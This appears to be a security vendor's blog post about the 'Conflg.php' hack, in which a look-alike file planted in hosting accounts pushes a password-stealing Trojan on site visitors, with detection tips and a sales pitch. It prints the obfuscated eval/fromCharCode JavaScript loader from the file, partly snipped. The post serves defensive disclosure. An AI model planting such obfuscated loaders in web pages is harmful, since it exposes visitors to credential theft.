• Conflg.php Hack

    One of the latest attacks we are tracking on the Internet has already infected about 250 websites at the time time of our post. This number is growing rapidly. We will be posting more details regarding the Conflg.php Hack and the reason it is infecting benign websites in our forthcoming posts.

    What is the purpose of the Conflg.php Hack?
    This particular attack creates a file called “Conflg.php” in the user’s hosting account. These malicious hackers apparently named the file “Conflg.php” in the hope that the name looks similar to the “config.php” file found in Worpress installations and many other CMS software. In most cases, the goal of the website infection is to prompt visitors to install a password stealing Trojan onto their PCs.

    The password stealing Trojan is loaded from sites including the following:


    The malware contained in Conflg.php looks like the following:

    var s=new String();try{document[0][1]}catch(q){if(q)r=1;c=Str ing;}if(r&&document.createTextNode)y=2;e=eval;m=[4.5*y,18/y,52.5*y,204/y,16*y,80/y,50*y,222/y,49.5*y,234/y,54.5*y,202/y,55*y,232/y,23*y,206/y,50.5*y,232/y,34.5*y,216/y,50.5*y,218/y,50.5*y,220/y,58*y,230/y,33*y,242/y,42*y,194/y,51.5*y,156/y,48.5*y,218/y,50.5*y,80/y,19.5*y,196/y,55.5*y,200/y,60.5*y,78/y,20.5*y,182/y,24*y,186/y,20.5*y,246/y,4.5*y,18/y,4.5*y,210/y,51*y,228/y,48.5*y,218/y,50.5*y,228/y,20*y,82/y,29.5*y,18/y,4.5*y,250/y,16*y,202/y,54*y,230/y,50.5*y,64/y,61.5*y,18/y,4.5*y,18/y,50*y,222/y,49.5*y,234/y,54.5*y,202/y,55*y,232/y,23*y,238/y,57*y,210/y,58*y,202/y,20*y[snipped],mm=c['fro'+'mCharCode'];for(i=0;i!=m.length;i++)s+=mm(e("m"+"["+"i"+']'));try{document.appendChild(null)}catch(q){e(s);}

    Why do malicious hackers use obfuscated filenames?
    The primary reason is to confuse the website owner about the legitimacy of the files contents. Since the owner thinks that the file containing the malware code is actually a legitimate file that is associated with the software powering the website, when this is in fact not the case, the contents of the file are unlikely to be deleted.

    How do I know if my site is infected?
    Check your website for the existence of a file named “Conflg.php” or the contents shown above. Additionally, please be extra vigilant if your website is hosted by Softlayer, or ThePlanet, as a majority of sites with this infection seem to have been hosted there (within their IP blocks).

    How do I protect my site?
    Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

    StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

    Till next time…